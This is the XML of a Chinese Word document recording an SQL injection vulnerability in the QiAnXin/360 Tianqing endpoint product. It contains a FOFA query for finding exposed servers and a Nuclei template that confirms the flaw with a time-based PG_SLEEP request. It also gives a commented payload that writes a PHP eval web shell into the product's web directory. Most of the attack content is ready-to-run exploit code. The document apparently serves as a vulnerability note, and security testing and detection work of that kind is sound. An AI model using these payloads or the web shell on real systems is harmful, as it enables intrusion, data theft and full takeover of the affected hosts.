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奇安信360天擎rptsvcsyncpoint SQL注入漏洞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rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>奇安信360天擎rptsvcsyncpoint SQL注入漏洞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banner="QiAnXin web server" || banner="360 web server"  || body="appid\":\"skylar6" || body="/task/index/detail?id={item.id}" || body="已过期或者未授权，购买请联系4008-136-360"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228981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6690" cy="25838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3、nucle脚本验证如下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id: qianxin-tianqing-rptsvcsyncpoint-sqli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info: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name: qianxin-tianqing-rptsvcsyncpoint-sqli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author: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m0be1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severity: high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tags: qianxin,sqli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description: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奇安信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天擎存在SQL注入漏洞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，攻击者可通过此漏洞获取敏感信息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metadata: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fofa-query: banner="QiAnXin web server" || banner="360 web server"  || body="appid\":\"skylar6" || body="/task/index/detail?id={item.id}" || body="已过期或者未授权，购买请联系4008-136-360"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verified: true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max-request: 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- raw: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@timeout: 50s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GET /api/dp/rptsvcsyncpoint?ccid=1%27;SELECT%20PG_SLEEP(3)--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matchers:    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name: mysql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dsl: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"status_code_1 == 200 &amp;&amp; duration&gt;=3 &amp;&amp; contains(body,'file_count') &amp;&amp; contains(header,'application/json')"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#rce：/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('&lt;?php @eval($_POST[1]);?&gt;');copy O(T) to 'C:\Program Files (x86)\360\skylar6\www\1.php';drop table O;-- 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#1.php        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其实外网存在的也不多了，记录下漏洞。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75145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62557"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="035625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7F5457C"/>
    <w:rsid w:val="174C28A8"/>
    <w:rsid w:val="47470357"/>
    <w:rsid w:val="62031A89"/>
    <w:rsid w:val="7DE4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2023-11-09T13:47:13Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>wll</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-09T14:11:01Z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96AE3EDA0A844274B531D38FA72CA21D_12</vt:lpwstr>
  </property>
</Properties>
</file>